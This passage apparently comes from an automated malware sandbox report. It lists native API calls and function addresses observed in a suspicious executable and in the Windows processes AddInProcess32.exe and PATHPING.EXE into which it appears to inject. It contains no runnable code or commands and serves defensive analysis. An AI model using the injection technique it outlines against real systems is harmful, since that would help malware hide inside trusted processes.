              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12DD0 NtDelayExecution,LdrInitializeThunk,7_2_02C12DD0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02C12DF0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02C12D10
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02C12D30
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C135C0 NtCreateMutant,LdrInitializeThunk,7_2_02C135C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C139B0 NtGetContextThread,LdrInitializeThunk,7_2_02C139B0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12AB0 NtWaitForSingleObject,7_2_02C12AB0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12B80 NtQueryInformationFile,7_2_02C12B80
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12EA0 NtAdjustPrivilegesToken,7_2_02C12EA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12E30 NtWriteVirtualMemory,7_2_02C12E30
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12F90 NtProtectVirtualMemory,7_2_02C12F90
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12FA0 NtQuerySection,7_2_02C12FA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12F60 NtCreateProcessEx,7_2_02C12F60
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12CC0 NtQueryVirtualMemory,7_2_02C12CC0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12CF0 NtOpenProcess,7_2_02C12CF0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12C00 NtQueryInformationProcess,7_2_02C12C00
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12DB0 NtEnumerateKey,7_2_02C12DB0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C12D00 NtSetInformationFile,7_2_02C12D00
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C13090 NtSetValueKey,7_2_02C13090
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C13010 NtOpenDirectoryObject,7_2_02C13010
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C13D70 NtOpenThread,7_2_02C13D70
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C13D10 NtOpenProcessToken,7_2_02C13D10
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004275F0 NtCreateFile,7_2_004275F0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00427750 NtReadFile,7_2_00427750
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00427840 NtDeleteFile,7_2_00427840
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004278D0 NtClose,7_2_004278D0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00427A30 NtAllocateVirtualMemory,7_2_00427A30
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D799CB0 CreateProcessAsUserW,0_2_0D799CB0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_026D62B80_2_026D62B8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_026D71A80_2_026D71A8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606E2140_2_0606E214
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_060610AC0_2_060610AC
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606E2080_2_0606E208
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606E2680_2_0606E268
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606F0700_2_0606F070
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606D0780_2_0606D078
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606D0C00_2_0606D0C0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606B0D40_2_0606B0D4
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0606D0D00_2_0606D0D0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_063C14080_2_063C1408
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_063CC6E00_2_063CC6E0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_063CC6DD0_2_063CC6DD
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_063C88780_2_063C8878
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_063CB1600_2_063CB160
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_077411400_2_07741140
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0774EC600_2_0774EC60
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0774EC2D0_2_0774EC2D
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2B3380_2_07B2B338
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B286310_2_07B28631
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2A2400_2_07B2A240
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2C2480_2_07B2C248
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2A9680_2_07B2A968
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2DFD80_2_07B2DFD8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2E3520_2_07B2E352
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2E3580_2_07B2E358
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2A2310_2_07B2A231
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B296020_2_07B29602
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2C2010_2_07B2C201
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2E9B20_2_07B2E9B2
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2E5900_2_07B2E590
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2E5800_2_07B2E580
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2C9190_2_07B2C919
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2D0F00_2_07B2D0F0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2D0E10_2_07B2D0E1
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2DCE80_2_07B2DCE8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_07B2DCD80_2_07B2DCD8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_080CA9400_2_080CA940
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_080C23880_2_080C2388
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_080CC2B00_2_080CC2B0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_080C23790_2_080C2379
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7940480_2_0D794048
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7928E00_2_0D7928E0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D79DB180_2_0D79DB18
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D794FA80_2_0D794FA8
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D79A2480_2_0D79A248
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7985E00_2_0D7985E0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7938780_2_0D793878
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7900400_2_0D790040
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7940380_2_0D794038
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7900070_2_0D790007
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D796CF00_2_0D796CF0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D796CE00_2_0D796CE0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7928D00_2_0D7928D0
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D792B710_2_0D792B71
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D792B800_2_0D792B80
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D7932100_2_0D793210
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0D79EE100_2_0D79EE10
              Source: C:\Users\user\Desktop\rFV23+17555.exeCode function: 0_2_0774113A0_2_0774113A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00404A554_2_00404A55
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004012604_2_00401260
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401AC04_2_00401AC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401ABF4_2_00401ABF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0042D3634_2_0042D363
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040FB8B4_2_0040FB8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040FB934_2_0040FB93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041647E4_2_0041647E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004034004_2_00403400
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004164834_2_00416483
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040FDB34_2_0040FDB3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040262B4_2_0040262B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004026304_2_00402630
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040DE334_2_0040DE33
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B901AA4_2_01B901AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B841A24_2_01B841A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B881CC4_2_01B881CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC01004_2_01AC0100
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6A1184_2_01B6A118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B581584_2_01B58158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B620004_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE3F04_2_01ADE3F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B903E64_2_01B903E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8A3524_2_01B8A352
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B502C04_2_01B502C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B702744_2_01B70274
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B905914_2_01B90591
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD05354_2_01AD0535
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7E4F64_2_01B7E4F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B744204_2_01B74420
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B824464_2_01B82446
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACC7C04_2_01ACC7C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD07704_2_01AD0770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF47504_2_01AF4750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEC6E04_2_01AEC6E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD29A04_2_01AD29A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B9A9A64_2_01B9A9A6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE69624_2_01AE6962
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB68B84_2_01AB68B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AFE8F04_2_01AFE8F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD28404_2_01AD2840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADA8404_2_01ADA840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B86BD74_2_01B86BD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8AB404_2_01B8AB40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACEA804_2_01ACEA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE8DBF4_2_01AE8DBF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ACADE04_2_01ACADE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6CD1F4_2_01B6CD1F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADAD004_2_01ADAD00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B70CB54_2_01B70CB5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC0CF24_2_01AC0CF2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0C004_2_01AD0C00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4EFA04_2_01B4EFA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADCFE04_2_01ADCFE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC2FC84_2_01AC2FC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B72F304_2_01B72F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B12F284_2_01B12F28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF0F304_2_01AF0F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B44F404_2_01B44F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8CE934_2_01B8CE93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE2E904_2_01AE2E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8EEDB4_2_01B8EEDB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8EE264_2_01B8EE26
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD0E594_2_01AD0E59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADB1B04_2_01ADB1B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B9B16B4_2_01B9B16B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABF1724_2_01ABF172
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0516C4_2_01B0516C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B870E94_2_01B870E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8F0E04_2_01B8F0E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD70C04_2_01AD70C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7F0CC4_2_01B7F0CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B1739A4_2_01B1739A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8132D4_2_01B8132D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABD34C4_2_01ABD34C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD52A04_2_01AD52A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B712ED4_2_01B712ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEB2C04_2_01AEB2C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6D5B04_2_01B6D5B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B875714_2_01B87571
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8F43F4_2_01B8F43F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC14604_2_01AC1460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8F7B04_2_01B8F7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B816CC4_2_01B816CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B659104_2_01B65910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD99504_2_01AD9950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEB9504_2_01AEB950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD38E04_2_01AD38E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3D8004_2_01B3D800
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEFB804_2_01AEFB80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B45BF04_2_01B45BF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0DBF94_2_01B0DBF9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8FB764_2_01B8FB76
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B15AA04_2_01B15AA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B71AA34_2_01B71AA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6DAAC4_2_01B6DAAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7DAC64_2_01B7DAC6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B43A6C4_2_01B43A6C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8FA494_2_01B8FA49
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B87A464_2_01B87A46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEFDC04_2_01AEFDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B87D734_2_01B87D73
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B81D5A4_2_01B81D5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD3D404_2_01AD3D40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8FCF24_2_01B8FCF2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B49C324_2_01B49C32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8FFB14_2_01B8FFB1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD1F924_2_01AD1F92
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B8FF094_2_01B8FF09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD9EB04_2_01AD9EB0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C602C07_2_02C602C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C802747_2_02C80274
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA03E67_2_02CA03E6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BEE3F07_2_02BEE3F0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9A3527_2_02C9A352
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C720007_2_02C72000
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C981CC7_2_02C981CC
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA01AA7_2_02CA01AA
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C681587_2_02C68158
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BD01007_2_02BD0100
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C7A1187_2_02C7A118
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BFC6E07_2_02BFC6E0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BDC7C07_2_02BDC7C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C047507_2_02C04750
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE07707_2_02BE0770
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C8E4F67_2_02C8E4F6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C924467_2_02C92446
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C844207_2_02C84420
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA05917_2_02CA0591
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE05357_2_02BE0535
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BDEA807_2_02BDEA80
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C96BD77_2_02C96BD7
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9AB407_2_02C9AB40
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC68B87_2_02BC68B8
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C0E8F07_2_02C0E8F0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BEA8407_2_02BEA840
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE28407_2_02BE2840
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE29A07_2_02BE29A0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CAA9A67_2_02CAA9A6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BF69627_2_02BF6962
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9EEDB7_2_02C9EEDB
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BF2E907_2_02BF2E90
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9CE937_2_02C9CE93
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE0E597_2_02BE0E59
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9EE267_2_02C9EE26
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BECFE07_2_02BECFE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C5EFA07_2_02C5EFA0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BD2FC87_2_02BD2FC8
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C54F407_2_02C54F40
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C22F287_2_02C22F28
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C00F307_2_02C00F30
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C82F307_2_02C82F30
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BD0CF27_2_02BD0CF2
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C80CB57_2_02C80CB5
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE0C007_2_02BE0C00
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BF8DBF7_2_02BF8DBF
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BDADE07_2_02BDADE0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BEAD007_2_02BEAD00
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C7CD1F7_2_02C7CD1F
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BE52A07_2_02BE52A0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C812ED7_2_02C812ED
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BFB2C07_2_02BFB2C0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C2739A7_2_02C2739A
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C9132D7_2_02C9132D
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BCD34C7_2_02BCD34C
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02C8F0CC7_2_02C8F0CC
